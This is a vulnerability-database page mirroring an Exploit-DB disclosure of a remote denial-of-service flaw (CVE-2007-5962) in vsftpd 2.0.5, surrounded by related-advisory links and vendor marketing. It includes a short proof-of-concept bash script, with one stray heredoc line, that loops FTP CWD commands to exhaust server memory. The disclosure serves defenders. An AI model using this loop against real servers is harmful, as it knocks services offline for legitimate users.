Lucene search
+L

vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)

🗓️ 21 May 2008 00:00:00Reported by Martin NagyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 66 Views

vsftpd 2.0.5 - Remote Denial of Service via 'deny_file' Optio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2007-5962
21 May 200800:00
circl
CVE
CVE-2007-5962
22 May 200810:00
cve
Cvelist
CVE-2007-5962
22 May 200810:00
cvelist
Debian CVE
CVE-2007-5962
22 May 200810:00
debiancve
Exploit DB
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)
21 May 200800:00
exploitdb
Exploit DB
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption
14 Jun 200800:00
exploitdb
Oracle linux
vsftpd security and bug fix update
30 May 200800:00
oraclelinux
Fedora
[SECURITY] Fedora 8 Update: vsftpd-2.0.5-20.fc8
22 May 200820:37
fedora
Fedora
[SECURITY] Fedora 9 Update: vsftpd-2.0.6-4.fc9
22 May 200820:38
fedora
Fedora
[SECURITY] Fedora 7 Update: vsftpd-2.0.5-17.fc7
22 May 200820:38
fedora
Rows per page
source: https://www.securityfocus.com/bid/29322/info


The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart

$ cat > memtest.sh <<EOF
 EOF
#!/bin/bash
echo USER anonymous
echo PASS [email protected]

while [ 1 ]; do
        echo CWD pub
        echo CWD ..
done
EOF

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.1
EPSS0.12061
66